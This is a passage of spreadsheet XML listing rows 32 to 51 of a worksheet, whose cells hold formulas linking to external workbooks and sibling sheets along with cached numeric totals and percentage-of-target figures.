      <c r="M32" s="225">
        <f>'[11]25'!$L$13</f>
        <v>59013.266</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>118.026532</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]25'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]25'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]25'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]25'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]25'!$U$76</f>
        <v>4e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]25'!$V$76</f>
        <v>4.10863509749304e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]25'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]25'!$R$76</f>
        <v>2.4e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]25'!$S$76</f>
        <v>3.54e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]25'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'24'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]25'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'24'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]25'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]25'!$W$77</f>
        <v>21.14</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]25'!$X$77</f>
        <v>19.28</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]25'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]25'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]25'!$U$77</f>
        <v>17.3716666666683</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]25'!$V$77</f>
        <v>59.9355849582187</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]25'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]25'!$R$77</f>
        <v>104.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]25'!$S$77</f>
        <v>5164.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]25'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'24'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]25'!$I$50</f>
        <v>1303.53</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'24'!K34</f>
        <v>19359.24</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>486562.17</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]25'!$L$15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'[11]25'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'24'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]25'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'24'!K35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G36+'24'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'24'!K36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G37+'24'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'24'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]25'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]25'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]25'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'24'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]25'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'24'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]25'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'24'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'24'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]25'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]25'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]25'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'24'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]25'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'24'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]25'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'24'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'24'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]25'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]25'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]25'!$R$50</f>
        <v>320.54</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'24'!U39</f>
        <v>8003.32</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>86816.919</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]25'!$V$50</f>
        <v>250</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'24'!X39</f>
        <v>7940</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>86699</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]25'!$Y$50</f>
        <v>1294.866</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'24'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'24'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]25'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]25'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]25'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]25'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]25'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]25'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]25'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]25'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]25'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]25'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]25'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'24'!H41</f>
        <v>15203</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>140179</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]25'!$I$16</f>
        <v>1147.37</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'24'!K41</f>
        <v>22014.15</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>143407.69</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]25'!$L$16</f>
        <v>19318.61</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>64.3953666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]25'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]25'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]25'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'24'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]25'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'24'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]25'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]25'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]25'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'24'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]25'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'24'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]25'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]25'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]25'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]25'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'24'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]25'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'24'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]25'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]25'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]25'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'24'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]25'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'24'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]25'!$L$14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'[12]25'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'24'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]25'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'24'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]25'!$L$15</f>
        <v>55872.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]25'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]25'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]25'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'24'!U44</f>
        <v>5784.8</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70537.968</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]25'!$V$29</f>
        <v>193</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'24'!X44</f>
        <v>4494</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>70904</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]25'!$Y$29</f>
        <v>3590.257</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]25'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'24'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]25'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'24'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]25'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]25'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]25'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]25'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]25'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]25'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]25'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]25'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]25'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'24'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'24'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]25'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]25'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]25'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'24'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]25'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'24'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]25'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'24'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'24'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]25'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]25'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]25'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'24'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]25'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'24'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]25'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'24'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'24'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]25'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]25'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]25'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'24'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]25'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'24'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]25'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'24'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'24'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]25'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]25'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]25'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'24'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]25'!$V$8</f>
        <v>644.7742</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'24'!X49</f>
        <v>3475.1089</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>180005.4489</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]25'!$Y$8</f>
        <v>7118.51610000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'24'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'24'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]25'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]25'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]25'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'24'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]25'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'24'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]25'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]25'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]25'!$E$24</f>
        <v>2793</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'24'!H51</f>
        <v>100865.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1477264.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]25'!$I$24</f>
        <v>3424.69</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'24'!K51</f>
        <v>120473.667</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1483597.598</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]25'!$L$24</f>
        <v>29091.0169999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>64.646704444444</v>
